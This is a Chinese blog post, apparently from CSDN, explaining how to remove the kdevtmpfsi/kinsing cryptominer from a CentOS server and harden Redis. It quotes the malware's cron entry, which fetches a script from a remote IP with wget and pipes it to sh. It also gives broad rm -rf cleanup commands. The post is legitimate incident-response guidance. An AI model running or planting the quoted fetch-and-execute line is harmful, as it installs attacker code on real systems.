彻底解决 centor os kdevtmpfsi进程占用200% 导致部署应用重启

最新推荐文章于 2024-01-14 10:15:07 发布
最新推荐文章于 2024-01-14 10:15:07 发布
阅读量1k 收藏
点赞数
分类专栏: JAVA Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30512027/article/details/103865376
版权
JAVA 同时被 2 个专栏收录
50 篇文章 1 订阅
订阅专栏
Linux
9 篇文章 0 订阅
订阅专栏

网上搜索了解大概是个挖矿木马

1、top 找到主进程

2、systemctl status 主进程

3、kill -9 杀掉相关进程

4、find / -name "kdevtmpfsi"  find / -name "kinsing" 删掉两个相关文件

rm -rf /tmp/kdevtmpfsi

rm -rf /var/tmp/kinsing 

5、netstat -natp 查看异常ip 封禁!!!

6、查看异常定时任务

 crontab -l
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
删除

sed -i '/unk.sh/d' /var/spool/cron/root

7、删除相关变种文件

find / -name "kinsing*" | xargs rm -rf

然后注意关闭ecs暴露的redis 此程序大都是因为redis漏洞引起:

修改端口号、增加安全密码防止被扫描到

程序猿吉良吉影
关注
专栏目录
Linux——kdevtmpfsi(挖矿)进程解决方法与解决过程
Hern(宋兆恒)
03-23 9956
问题 CPU堵塞(100%)。我这里的主进程是YDService,你的可能和我的不一致。 原因 服务器密码被别人知道 防火墙设置问题 …… 解决方法 1、查看进程,记录下占用CPU的进程PID(包括挖矿主进程PID)命令: top 或 ps aux | less 2、查看异常链接(有助于发现问题缘由),命令: netstat -natp 或 netstat -n...
kdevtmpfsi 处理(挖矿病毒清除)
Ancoda的博客
04-26 8031
kdevtmpfsi 是一个挖矿病毒,大多数都是 redis 程序侵入,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。普遍比较明显的就是 占用高额的CPU、内存资源,而且受害者还不少。
清除挖矿病毒 kdevtmpfsi记录
第一天
05-17 390
某日登录服务器,查看到cpu使用异常 负载很高 查看下cpu进程使用情况 kdevtmpfsi 这个进程使用异常 28243 polkitd 20 0 2915868 2.3g 0 S 193.0 29.9 673812:14 kdevtmpfsi ps aux 查看下这个进程的路径 kill -9 28243 删除进程 查看是否存在定时任务 https://blog.csdn.net/qq_45186545/article/details/103853601 http
[服务器异常] kdevtmpfsi 进程
yyp946的博客
01-14 489
这个进程的启动是通过 redis,那么需要检查 redis 用的 cron,直接查看 /var/spool/cron 目录下的文件。起初的操作就是直接 kill 掉,但是 kill 掉后进程又自动启动,能自动启动应该有一个启动脚本在处理,先处理进程问题。今天突然收到了服务器的报警信息,登录服务器通过 top 检查发现一个不认识的进程占用了大量的 CPU。通过 systemct 找出这个进程相关信息,直接 kill 掉 5906 10237,同时删除文件。清空 redis 文件,完成异常处理。
Linux 病毒kdevtmpfsi被挖矿的解决办法(四) 定时脚本删除挖矿病毒脚本
80后大叔爱学习
02-09 889
#!/bin/bash chattr -ia /root/.ssh/authorized_keys echo "自己定义rsa" > /root/.ssh/authorized_keys chattr +ia /root/.ssh/authorized_keys chattr -i /tmp/kdevtmpfsi chattr -i /tmp/redis2 rm -rf /tmp/kdevtmpfsi rm -rf /tmp/redis2 chattr -i /etc/config.json .
centor os 安装nginx
05-10
可以按照以下步骤来在 CentOS 上安装 Nginx: 1. 更新系统软件包: ``` sudo yum update -y ``` 2. 安装 EPEL 存储库: ... sudo yum install epel-release ...如果 Nginx 服务正在运行,那么你应该会看到类似于...
centoros7关闭防火墙
06-08
您可以通过以下步骤关闭CentOS 7上的防火墙: 1. 登录到CentOS 7服务器。 2. 运行以下命令以停止防火墙服务: ``` systemctl stop firewalld.service ``` 3. 运行以下命令以禁用防火墙服务在系统启动时自动...
centoros如何查询rocketmq 是否在使用
03-31
3. 运行以下命令来列出所有正在运行的进程: ``` ps aux ``` 4. 在输出中查找RocketMQ相关的进程,例如: ``` /opt/rocketmq/bin/mqbroker -n localhost:9876 ``` 这表示RocketMQ的broker进程正在运行,...
centorOS 中rocketmq如何创建topic并且使用
03-31
在CentOS中创建RocketMQ的topic,可以按照以下步骤: 1. 安装RocketMQ 首先需要安装RocketMQ,可以参考官方文档进行安装。 2. 修改配置文件 在RocketMQ的配置文件中,需要添加以下配置来启用topic自动创建功能:...
centos8部署zabbix6.4 虚拟机VMware部署
最新发布
03-13
网络运维之zabbix部署
kdevtmpfsi样本.zip
03-16
kdevtmpfsi样本,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可
redis 漏洞攻击 病毒程序 kdevtmpfsi
qq_17056391的博客
03-10 328
一个redis 程序占用cpu 46%,虽然redis-server 有定时清理过期的键,但也不会占用这么高的CPU吧,一般都是0.3% 看看这个进程什么鬼 systemctl status 14561 然后找到了它的父亲进程 在 /var/tmp/kinsing 杀掉进程没用 还会重启 解决办法关闭redis 杀掉进程 删除病毒文件,最好是删除redis然后重装redis ,redis修改下默认的端口,一定要给redis设置上密码 ...
CentOSkdevtmpfsi病毒
jinglinggg的专栏
12-06 1357
CentOSkdevtmpfsi病毒,几日的查杀,最终失败!
阿里云Centos 解决挖矿程序:kdevtmpfsi--服务器CPU占用高、内存占用
暮歌半生情朽的博客
09-17 834
前言 互联网存在很多的漏洞,如果我们使用不当,就会别被别人利用或者是盗取信息。之前在阿里云买的服务器,自己配置了nginx,mysql,redis等服务。由于在某些时候,本地程序开发中需要使用这些服务,便开放了相关的接口包括redis 的6379端口。通过查阅资料,病毒经常利用redis的6379端口被注入。 中毒具体描述 某一天,我写完本地程序,准备部署到云服务器,然而我的xshell始终是连接不上服务器,或者是连接上反应非常慢,我怀疑阿里云对我的服务器动了什么了(实在是对不住,毕竟我也不知道还有这种事情
【服务器】挖矿病毒 kdevtmpfsi(一针见效)
王世凡的技术博客
07-23 1098
附:尝试了许多普通kill 和 rm 操作,发现根本无法解决问题。分析原因在于定时任务为删除掉。 状态:CPU爆满,导致线上服务宕机。 图片是盗的,进程占用是真实的。 1、# top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了 此时,挖矿脚本大概率定时在你的crontab里面。 crontab -l ,发现异常定时任务,* * *
kdevtmpfsi 挖矿病毒清除
u010227042的博客
03-11 1042
保险:如果CPU还是高速运转,你只需重复第一步即刻,因为它的威胁文件被我删除了,如果还在跑我们清理。这个病毒大多数都是通过你的redis 程序侵入的,你只需要配置,所以你要配置你的redis配置文件。crontab -r //表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。这个病毒会在你的主机密钥中加入他们的公钥,这是他们留了后门的钥匙,可以免密登录你的电脑。vim ~/.ssh/authorized_keys //打开文件后删除不认识的公钥。进程,就不会再有了,
Linux被kdevtmpfsi 挖矿病毒入侵
phubing
04-03 717
Linux被kdevtmpfsi挖矿病毒入侵 一. 错误信息 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。使用netstat -antp命令查看端口使用情况,又出现了kdevtmpfsi如图三所示 netsta...
kdevtmpfsi 挖矿病毒清除(亲测)
逸雅安然
07-07 4330
废话不多说,直接开始清理 找到矿毒进程 ps -aux | grep kinsing ps -aux | grep kdevtmpfsi 杀死进程: kill -9 PID (杀死两个) 删除Linux下的异常定时任务 crontab -l //查看定时任务 crontab -r //表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除 删除文件 rm -rf kdevtmpfsi rm -rf /var/tmp/kinsing 最后自己可以再检查一下是否还有
记录kdevtmpfsi病毒
挥起镰刀的博客
05-27 1348
2021-5-26日,通过IDEA2020中的Docker插件来连接腾讯云服务器。由于开放了2375端口,并未做任何安全配置,中了挖矿病毒kdevtmpfsi。 使用 kill 命令可以将程序终止,但是Root的大部分命令权限被黑,已经无法操作,尚未解决。 通过docker中的不明容器可以判断,确实是通过docker进入的 由于百度解决未果,只能备份数据后重装系统。。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值